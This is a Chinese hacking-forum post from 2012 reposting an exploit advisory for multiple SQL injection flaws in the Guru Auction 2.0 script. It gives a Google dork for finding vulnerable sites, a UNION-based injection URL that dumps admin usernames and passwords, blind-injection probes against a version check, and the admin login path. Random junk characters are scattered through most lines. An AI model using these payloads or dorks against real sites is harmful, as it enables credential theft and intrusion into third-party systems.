找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2093|回复: 0
打印 上一主题 下一主题

Guru Auction 2.0多重sql注射

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-31 09:24:05 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Guru Auction 2.0 Multiple SQL Injection Vulnerabilities& M6 v% p" O- h: A/ C: Y- g; D
# b. l. H# g5 k: _" t
作者     : v3n0m
) ~1 m% o, z. Q! i  w$ I9 [0 U应用 : Guru Auction 2.0
$ Q1 G8 w. I  A+ J# D" H& NPrice       : $491 w3 W& Q. _; k. L3 S' g' j
Vendor      : http://www.guruscript.com/( D% o/ j& U5 @% z# L% y
Google Dork : inurl:subcat.php?cate_id=
9 h/ f' z: J7 I 2 i; @7 S* J7 J0 Y$ ~! a" N
SQLi p0c:. j0 b* L1 n$ Z. a8 V! C/ }
~~~~~~~~~~
4 S" R; T% W' a4 |$ Jhttp://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
4 H) x  J! G5 z: e7 f5 f( Z / c' Q7 }% S8 a3 D8 N
, n) ]- C5 E) v1 b) x' {: i
盲注 p0c:  k+ R& M1 ?7 c
~~~~~~~~~~
' y& m6 t6 n  F# }' P" D3 ghttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true9 Z' t$ q; F2 g: Q0 H: c
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false; a6 l) u( q" }8 X

7 X% F6 L: _: @# D* M2 U管理登录入口:
) z4 ]8 K/ p1 c" V4 E; L- D8 r5 E~~~~~~~~~~
/ P: g6 H, l( w3 r* fhttp://domain.tld/[path]/admin/& V. b% U% z5 D6 ^0 f% Z
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表